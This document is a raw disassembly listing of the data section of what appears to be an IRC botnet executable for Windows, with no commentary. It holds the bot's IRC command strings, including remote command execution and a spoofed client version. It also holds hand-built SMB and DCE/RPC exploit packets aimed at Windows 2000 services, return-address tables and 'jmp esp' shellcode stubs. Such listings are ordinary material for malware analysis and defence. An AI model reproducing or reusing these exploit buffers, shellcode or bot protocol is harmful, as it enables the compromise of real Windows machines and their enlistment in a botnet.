aItTookMeUms_ db 'It took me %ums.',0 ; DATA XREF: sub_40A9CF+DA9�o
align 4
dword_419BC4 dd 65736162h, 65203436h, 646F636Eh, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+D20�o
dd 2037325h, 0
dword_419BE0 dd 293E0h ; DATA XREF: sub_40A9CF+CAF�r
align 8
dword_419BE8 dd 0E426671h ; DATA XREF: sub_40A9CF+C68�r
dd 3 dup(0)
dword_419BF8 dd 0E04A6C27h ; DATA XREF: sub_40A9CF+C05�r
dd 4 dup(0)
dword_419C0C dd 2BBDB0A9h ; DATA XREF: sub_40A9CF+BDE�r
dd 3 dup(0)
dword_419C1C dd 86670h ; DATA XREF: sub_40A9CF+B97�r
dd 2 dup(0)
dword_419C28 dd 23C76670h ; DATA XREF: sub_40A9CF+B82�r
dd 2 dup(0)
dword_419C34 dd 4CBE670h ; DATA XREF: sub_40A9CF+B6D�r
align 10h
dword_419C40 dd 2577B5A0h ; DATA XREF: sub_40A9CF+B3F�r
dd 2 dup(0)
dword_419C4C dd 203A5049h, 2343003h, 2037325h, 0 ; DATA XREF: sub_40A9CF+B20�o
dword_419C5C dd 4C38h ; DATA XREF: sub_40A9CF+B0C�r
dd 0
dword_419C64 dd 123F0AA8h ; DATA XREF: sub_40A9CF+AE5�r
align 10h
dword_419C70 dd 289D4860h ; DATA XREF: sub_40A9CF+AB4�r
dd 2 dup(0)
dword_419C7C dd 28A446E8h ; DATA XREF: sub_40A9CF+A83�r
dd 2 dup(0)
dword_419C88 dd 5E9DD92Bh ; DATA XREF: sub_40A9CF+A5D�r
dd 3 dup(0)
dword_419C98 dd 5E9E29C3h ; DATA XREF: sub_40A9CF+A11�r
dd 3 dup(0)
dword_419CA8 dd 489DAC36h ; DATA XREF: sub_40A9CF+9DC�r
dd 3 dup(0)
dword_419CB8 dd 29A560E1h ; DATA XREF: sub_40A9CF+9A1�r
dd 3 dup(0)
dword_419CC8 dd 9A060h ; DATA XREF: sub_40A9CF+96C�r
dd 2 dup(0)
dword_419CD4 dd 69F334E0h ; DATA XREF: sub_40A9CF+937�r
dd 3 dup(0)
dword_419CE4 dd 14EFBCE0h ; DATA XREF: sub_40A9CF+911�r
align 10h
dword_419CF0 dd 0A7768h ; DATA XREF: sub_40A9CF+8FC�r
dd 2 dup(0)
dword_419CFC dd 0B4768h ; DATA XREF: sub_40A9CF+8C5�r
dd 2 dup(0)
dword_419D08 dd 43B8h ; DATA XREF: sub_40A9CF+87E�r
align 10h
aThisBuildIsBro db 'This build is broken and will not function properly.',0
; DATA XREF: sub_40A9CF:loc_40B1D8�o
align 4
aThisBuildIsFul db 'This build is fully functional',0 ; DATA XREF: sub_40A9CF+7FD�o
align 4
dword_419D68 dd 2343003h, 4B4F5242h, 2034E45h, 0 ; DATA XREF: sub_40A9CF:loc_40B1AD�o
dword_419D78 dd 2333003h, 2034B4Fh, 0 ; DATA XREF: sub_40A9CF+7D2�o
dword_419D84 dd 0ACh, 0 ; DATA XREF: sub_40A9CF+79E�o
dword_419D8C dd 0B4B7B58Ah, 0EBD0ACF6h, 0EE9DA98Dh, 0DBFAB7E3h, 0B19CD9FFh
; DATA XREF: sub_40A9CF+790�o
dd 8CBCB6DEh, 0E09BA9F5h, 2 dup(0)
dword_419DB0 dd 3115E88h ; DATA XREF: sub_40A9CF+77A�r
dd 2 dup(0)
dword_419DBC dd 0B12C0878h ; DATA XREF: sub_40A9CF+753�r
dd 3 dup(0)
dword_419DCC dd 0EE5AD128h ; DATA XREF: sub_40A9CF+6ED�r
dd 3 dup(0)
aALSsSCJEKi db '¿«×ÄÄØé˜Ü¹œ™Ï—؆ÎÜ¥µ»ª›',0 ; DATA XREF: sub_40A9CF+534�o
align 4
dd 0
dword_419DFC dd 0F888959Bh, 0F2FEEDF7h, 0BB8CE3A7h, 0C489EDAEh, 2 dup(0)
; DATA XREF: sub_40A9CF+448�o
dword_419E14 dd 0C5A9B38Ch, 0E7C0CDD4h, 0AD81C189h, 0EFB3F6BFh, 0C6B388B9h
; DATA XREF: sub_40A9CF+437�o
dd 0CDF6E2EAh, 80C8FFA2h, 0F583C599h, 0FF8A8EADh, 0D0F7DAF7h
dd 0A087E5A6h, 2 dup(0)
dword_419E48 dd 24648h ; DATA XREF: sub_40A9CF+410�r
align 10h
dword_419E50 dd 29A012A1h ; DATA XREF: sub_40A9CF+3E9�r
align 10h
dword_419E60 dd 29A0C6E9h ; DATA XREF: sub_40A9CF+3BB�r
align 10h
dword_419E70 dd 38323166h, 2B636E65h, 20626166h, 72636564h, 65747079h
; DATA XREF: sub_40A9CF+39C�o
dd 3203A64h, 25023430h, 20373h
dword_419E90 dd 0FDD9520h ; DATA XREF: sub_40A9CF+2C0�r
dd 2 dup(0)
dword_419E9C dd 38323166h, 2B636E65h, 20626166h, 72636E65h, 65747079h
; DATA XREF: sub_40A9CF+2A1�o
dd 3D203A64h, 2343003h, 2037325h, 0
dword_419EC0 dd 232320h ; DATA XREF: sub_40A9CF+1E3�o
dword_419EC4 dd 25219520h ; DATA XREF: sub_40A9CF+18D�r
align 10h
dword_419ED0 dd 407D28h ; DATA XREF: sub_40A9CF+158�r
dd 2 dup(0)
dword_419EDC dd 72727543h, 20746E65h, 646E6977h, 203A776Fh, 2343003h
; DATA XREF: sub_40A9CF+139�o
dd 2037325h, 0
dword_419EF8 dd 47B91A8h ; DATA XREF: sub_40A9CF+106�r
dd 2 dup(0)
dword_419F04 dd 4B43494Eh, 732520h ; DATA XREF: sub_40A9CF+CC�o
; sub_40A9CF+EF�o ...
dword_419F0C dd 132330h ; DATA XREF: sub_40A9CF+90�r
dd 2 dup(0)
dword_419F18 dd 3677C869h ; DATA XREF: sub_40A9CF+69�r
dd 3 dup(0)
aLinkLink@linkP db 'link!link@link PRIVMSG %s :%s',0 ; DATA XREF: sub_40C93C+88�o
; sub_40D871+85F�o
align 4
asc_419F48: ; DATA XREF: sub_40C93C+30�o
; sub_40C93C+B5�o
unicode 0, <;>,0
asc_419F4C db '<=',0 ; DATA XREF: sub_40CA29:loc_40CE59�o
align 10h
asc_419F50 db '>=',0 ; DATA XREF: sub_40CA29:loc_40CE07�o
align 4
asc_419F54: ; DATA XREF: sub_40CA29:loc_40CDDB�o
dw 3Eh
unicode 0, <>,0
asc_419F58 db '!=',0 ; DATA XREF: sub_40CA29:loc_40CDAF�o
align 4
asc_419F5C db '==',0 ; DATA XREF: sub_40CA29:loc_40CD83�o
align 10h
aIpv6 db '$ipv6',0 ; DATA XREF: sub_40CA29:loc_40CC43�o
; sub_40CA29:loc_40CD58�o
align 4
aFirewall db '$firewall',0 ; DATA XREF: sub_40CA29:loc_40CC1F�o
; sub_40CA29:loc_40CD34�o
align 4
aLatency db '$latency',0 ; DATA XREF: sub_40CA29:loc_40CBFB�o
; sub_40CA29:loc_40CD10�o
align 10h
aFree_0 db '$free',0 ; DATA XREF: sub_40CA29:loc_40CBD7�o
; sub_40CA29:loc_40CCEC�o
align 4
aVersion db '$version',0 ; DATA XREF: sub_40CA29:loc_40CBB1�o
; sub_40CA29:loc_40CCC6�o
align 4
aUptime db '$uptime',0 ; DATA XREF: sub_40CA29+158�o
; sub_40CA29+26D�o
a32s16s32s db '%32s %16s %32s',0 ; DATA XREF: sub_40CA29+EE�o
align 4
asc_419FAC db '&&',0 ; DATA XREF: sub_40CA29+9D�o
; sub_40CA29+45D�o
align 10h
asc_419FB0: ; DATA XREF: sub_40CA29+28�o
unicode 0, <)>,0
aExecutingComma db 'Executing command(s): %s',0 ; DATA XREF: sub_40CEB0+5C�o
align 10h
a6667 db '6667',0 ; DATA XREF: sub_40CF2F:loc_40CF60�o
align 4
aCSCCUCUSCCC db '%c%s%c%c%u%c%u%s%c%c%c',0 ; DATA XREF: sub_40D043+27B�o
; sub_40D871+431�o
align 10h
aG: ; DATA XREF: sub_40D043+1DC�o
; sub_40D871+392�o
unicode 0, <G>,0
aA: ; DATA XREF: sub_40D043+1C6�o
; sub_40D871+37C�o
unicode 0, <A>,0
aB: ; DATA XREF: sub_40D043+1B0�o
; sub_40D871+366�o
unicode 0, <B>,0
aUnk db 'UNK',0 ; DATA XREF: sub_40D043+160�o
; sub_40D871+316�o
aUserSSSS db 'USER %s %s %s :%s',0 ; DATA XREF: sub_40D043+E2�o
align 4
aPassS db 'PASS %s',0 ; DATA XREF: sub_40D043+3F�o
aNoticeS db 'NOTICE %s :',0 ; DATA XREF: sub_40D420+10�o
; sub_40D53F+37�o
aPrivmsgS db 'PRIVMSG %s :',0 ; DATA XREF: sub_40D4AB+10�o
; sub_40D53F+AF�o
align 4
dword_41A038 dd 1 ; DATA XREF: sub_40D53F:loc_40D680�o
dword_41A03C dd 7373656Dh, 20656761h, 0 ; DATA XREF: sub_40D53F:loc_40D629�o
dword_41A048 dd 49544F4Eh, 25204543h, 13A2073h, 0 ; DATA XREF: sub_40D53F+8F�o
dword_41A058 dd 56495250h, 2047534Dh, 3A207325h, 1 ; DATA XREF: sub_40D53F+63�o
aMirc db 'mIRC',0 ; DATA XREF: sub_40D734+6�o
; sub_40D74D:loc_40D76E�o
align 10h
asc_41A070: ; DATA XREF: sub_40D871+CB7�o
unicode 0, <*>,0
aNotice db 'NOTICE',0 ; DATA XREF: sub_40D871:loc_40E1C0�o
; sub_40E618+89�o
align 4
asc_41A07C db '][',0 ; DATA XREF: sub_40D871+807�o
; sub_40D871+88C�o
align 10h
a332 db '332',0 ; DATA XREF: sub_40D871:loc_40DF8E�o
aNick db 'NICK',0 ; DATA XREF: sub_40D871:loc_40DF3E�o
align 4
a@: ; DATA XREF: sub_40D871:loc_40DEBE�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_40D871:loc_40DE96�o
; sub_40E618+33�o
a451 db '451',0 ; DATA XREF: sub_40D871:loc_40DE70�o
aUserhostS db 'USERHOST %s',0 ; DATA XREF: sub_40D871+5C4�o
; sub_40D871+5EE�o
aModeSXi db 'MODE %s +xi',0 ; DATA XREF: sub_40D871+571�o
a001 db '001',0 ; DATA XREF: sub_40D871:loc_40DD97�o
aModeSSmntu db 'MODE %s +smntu',0 ; DATA XREF: sub_40D871+515�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_40D871:loc_40DD25�o
align 4
aError db 'ERROR',0 ; DATA XREF: sub_40D871:loc_40DCFD�o
align 4
a433 db '433',0 ; DATA XREF: sub_40D871:loc_40DB2D�o
dword_41A0D8 dd 4950013Ah, 1474Eh ; DATA XREF: sub_40D871+290�o
dword_41A0E0 dd 4950013Ah, 474Eh ; DATA XREF: sub_40D871:loc_40DAEB�o
dword_41A0E8 dd 52455601h, 4E4F4953h, 1732520h, 0 ; DATA XREF: sub_40D871+265�o
aEggdropV1_6_16 db 'eggdrop v1.6.16',0 ; DATA XREF: sub_40D871:loc_40DAD1�o
dword_41A108 dd 52455601h, 4E4F4953h, 6E696C20h, 2576206Bh, 30252E64h
; DATA XREF: sub_40D871+24E�o
dd 73256433h, 69572820h, 2932336Eh, 1
dword_41A12C dd 4556013Ah, 4F495352h, 14Eh ; DATA XREF: sub_40D871+226�o
dword_41A138 dd 4556013Ah, 4F495352h, 4Eh ; DATA XREF: sub_40D871:loc_40DA81�o
aSend db 'SEND',0 ; DATA XREF: sub_40D871+CD�o
align 4
dword_41A14C dd 4344013Ah, 43h ; DATA XREF: sub_40D871+A6�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40D871:loc_40D8DD�o
; sub_40D871+901�o ...
aMode db 'MODE',0 ; DATA XREF: sub_40D871:loc_40D8C2�o
align 4
aPong db 'PONG',0 ; DATA XREF: sub_40D871:loc_40D8A7�o
align 4
aPongS db 'PONG %s',0 ; DATA XREF: sub_40D871+25�o
aPing db 'PING',0 ; DATA XREF: sub_40D871+A�o
align 4
aLinkLink@link db 'link!link@link',0 ; DATA XREF: sub_40E618:loc_40E7A5�o
align 4
byte_41A18C db 41h ; DATA XREF: sub_40E979+3C�r
; sub_40EB4E+24�r ...
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
dword_41A1D0 dd 3430032Dh, 3732502h, 30032E02h, 73250234h, 202D0203h
; DATA XREF: sub_4129CA+5C�o
dd 202E7525h, 20776152h, 6E617274h, 72656673h, 206F7420h
dd 63207325h, 6C706D6Fh, 2E657465h, 0
dd 1130h, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F9D463h, 750362C3h, 75035173h, 3 dup(717564B8h)
dd 71AB7BFBh, 773AD507h, 7C941EEDh, 77DB565Ch, 77FD1F89h
dd 2 dup(77E216B8h), 1130h, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dd 0FFCA8166h, 6A52420Fh, 2ECD5802h, 745A053Ch, 5E21B8EFh
dd 0FA8B4A9Dh, 0AFEA75AFh, 0E7FFE775h, 0
dd 2 dup(4A9D5E21h), 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F32836h, 750362C3h, 75035173h, 3 dup(7C2FA0F7h)
dd 2 dup(71AB7BFBh), 7C941EEDh, 77E216B8h, 77FD1F89h, 2 dup(77E216B8h)
dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
aFxnbfxfxnbfxfx:
unicode 0, <FXNBFXFXNBFXFXFXFX>,0
align 4
db 0CCh
db 0E0h, 0FDh, 7Fh
db 0CCh
db 0E0h, 0FDh, 7Fh
align 8
dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dd 20h, 0
dd 20h, 5C005Ch, 0
dd offset aUnexpectedRelo+24h
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
align 10h
dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
dd 2180310h, 10016C6h, 100139Dh, 1001C55h, 1001C98h
dword_41A7A8 dd 5F5C0A0Dh, 2E2Fh ; DATA XREF: sub_410649+59�o
; sub_410B52+F�o
dword_41A7B0 dd 30B0005h, 10h, 48h, 0 ; DATA XREF: sub_410649+F�o
dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41A7FC dd 3000005h, 10h, 5 dup(0) ; DATA XREF: sub_410649+181�o
dword_41A818 dd 10005h, 2 dup(0) ; DATA XREF: sub_410649+1AD�o
dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_41A860 dd 0 ; DATA XREF: sub_410649+475�o
dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
; ---------------------------------------------------------------------------
loc_41A894: ; DATA XREF: sub_410649+153�o
mov eax, [esp-4]
add eax, 0FFFFFAE0h
jmp eax
; ---------------------------------------------------------------------------
align 10h
loc_41A8A0: ; DATA XREF: sub_410649+E5�o
mov eax, [ebp+30h]
add eax, 0FFFFFB24h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_41A8AC: ; DATA XREF: sub_410649+202�o
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
jmp short loc_41A8C9
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_41A8B4: ; DATA XREF: sub_410649+2DB�o
jmp short near ptr word_41A8BA
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
word_41A8BA dw 0 ; CODE XREF: .data:loc_41A8B4�j
; ---------------------------------------------------------------------------
loc_41A8BC: ; DATA XREF: sub_410649+330�o
jmp short near ptr word_41A8C2
; ---------------------------------------------------------------------------
loc_41A8BE: ; CODE XREF: .data:loc_41A8AC�j
; .data:loc_41A8DC�j
jmp short loc_41A8C4
; ---------------------------------------------------------------------------
db 2 dup(0)
word_41A8C2 dw 0 ; CODE XREF: .data:loc_41A8BC�j
; ---------------------------------------------------------------------------
loc_41A8C4: ; CODE XREF: .data:loc_41A8BE�j
; DATA XREF: sub_410649+385�o
jmp short near ptr loc_41A8C9+1
; ---------------------------------------------------------------------------
dw 0FFFFh
db 0FFh
; ---------------------------------------------------------------------------
loc_41A8C9: ; CODE XREF: .data:0041A8AE�j
; .data:loc_41A8C4�j
inc dword ptr [eax]
; ---------------------------------------------------------------------------
db 0
off_41A8CC dd offset loc_41005C ; DATA XREF: sub_410649+449�o
dd 2 dup(0)
dword_41A8D8 dd 77F33723h ; DATA XREF: sub_410649+25A�o
; ---------------------------------------------------------------------------
loc_41A8DC: ; DATA XREF: sub_410649+286�o
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
dw 7FFDh
; ---------------------------------------------------------------------------
loc_41A8E0: ; DATA XREF: sub_410649+22E�o
lahf
jnz short loc_41A8FB
loc_41A8E3: ; DATA XREF: sub_410649+13D�o
add [ecx+1Ch], bl
loc_41A8E6: ; CODE XREF: .data:loc_41A8F0�j
add [ecx], al
loc_41A8E8: ; DATA XREF: sub_410649+111�o
or ecx, [ebx]
sbb eax, [eax]
loc_41A8EC: ; DATA XREF: sub_410649+127�o
jmp short near ptr dword_41A8F4
; ---------------------------------------------------------------------------
align 10h
loc_41A8F0: ; DATA XREF: sub_410649+FB�o
jmp short loc_41A8E6
; ---------------------------------------------------------------------------
align 4
dword_41A8F4 dd 85000000h ; CODE XREF: .data:loc_41A8EC�j
; ---------------------------------------------------------------------------
call dword ptr [ebx+4Dh]
loc_41A8FB: ; CODE XREF: .data:0041A8E1�j
inc edx
jb short $+2
; ---------------------------------------------------------------------------
dw 0
dd 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h, 240043h, 3F3F0000h, 3F3F3Fh, 0
dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dd offset loc_401495
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 2 dup(0)
; ---------------------------------------------------------------------------
sub sp, 71Ch
jmp esp
; ---------------------------------------------------------------------------
align 4
dd 1004600h, 7515123Ch, 751C123Ch, 42B68ABAh, 42D01E50h
dd 34000112h, 0
dd 150000h, 1B000106h, 20100h, 30C001Ch, 4002800h, 20008FFh
dd 10h, 0
dd 34EEA51Bh, 0
dd 12400h, 0
dword_41AF50 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_410B52+62�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_41AFDC dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+A2�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_41B088 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+E2�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_41B168 dd 3A000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+13C�o
dd 0AB80000h, 46300800h, 0FF04h, 1000000h, 0F00h, 495C5C5Ch
dd 244350h, 3F3F3F3Fh, 3Fh
dword_41B1A8 dd 5C000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+179�o
dd 4DC0800h, 400800h, 0DE00FF18h, 800DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 5C000903h, 574F5242h, 524553h, 0
dword_41B20C dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+1B9�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh
dd 3, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41B2B0 dd 66030000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+216�o
dd 3900800h, 3C1D0800h, 1C000010h, 0E0040003h, 0FFh, 2 dup(0)
dd 1C004A00h, 2004A03h, 2600h, 5C032340h, 45504950h, 5005Ch
dd 100300h, 31C0000h, 0
dd 3040000h, 0
dd 4221001Fh, 184E8h, 0
dd 10000h, 0
dd 1630000h, 0
dd 1630000h, 0
dword_41B338 dd 0 ; DATA XREF: sub_410B52+2C7�o
dd 0D7h, 1, 0
dd 1, 0
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
align 4
dd 2 dup(0)
dword_41B35C dd 0CA040000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+348�o
dd 1C80800h, 7CC90800h, 80000010h, 0E0040004h, 0FFh, 2 dup(0)
dd 80004A00h, 2004A04h, 2600h, 5C048740h, 45504950h, 5005Ch
dd 100300h, 4800000h, 0
dd 4680000h, 0
dd 72B3001Fh, 1A381h, 0
dd 10000h, 0
dd 2150000h, 0
dd 2150000h, 0
dword_41B3E4 dd 0 ; DATA XREF: sub_410B52+3DE�o
dd 85h, 2, 0
dd 2, 2EBh, 85h, 2 dup(0)
dword_41B408 dd 20804h, 0 ; DATA XREF: sub_410B52+285�o
; sub_410B52+29B�o ...
dword_41B410 dd 2080Ah, 0 ; DATA XREF: sub_410B52+26F�o
dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
